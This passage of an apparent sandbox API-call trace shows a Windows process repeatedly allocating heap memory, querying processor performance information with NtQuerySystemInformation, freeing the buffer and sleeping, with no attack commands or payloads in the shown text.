dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.016] Sleep (dwMilliseconds=0x110) [0239.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.032] Sleep (dwMilliseconds=0x110) [0239.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.071] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.071] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.072] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.072] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.072] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.072] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.072] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.072] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.073] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.073] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.074] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.074] Sleep (dwMilliseconds=0x110) [0239.119] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.120] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.120] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.120] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.120] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.121] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.122] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.124] Sleep (dwMilliseconds=0x110) [0239.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.158] Sleep (dwMilliseconds=0x110) [0239.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.172] Sleep (dwMilliseconds=0x110) [0239.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.190] Sleep (dwMilliseconds=0x110) [0239.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.204] Sleep (dwMilliseconds=0x110) [0239.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.223] Sleep (dwMilliseconds=0x110) [0239.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.237] Sleep (dwMilliseconds=0x110) [0239.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.254] Sleep (dwMilliseconds=0x110) [0239.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.270] Sleep (dwMilliseconds=0x110) [0239.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.285] Sleep (dwMilliseconds=0x110) [0239.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.301] Sleep (dwMilliseconds=0x110) [0239.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 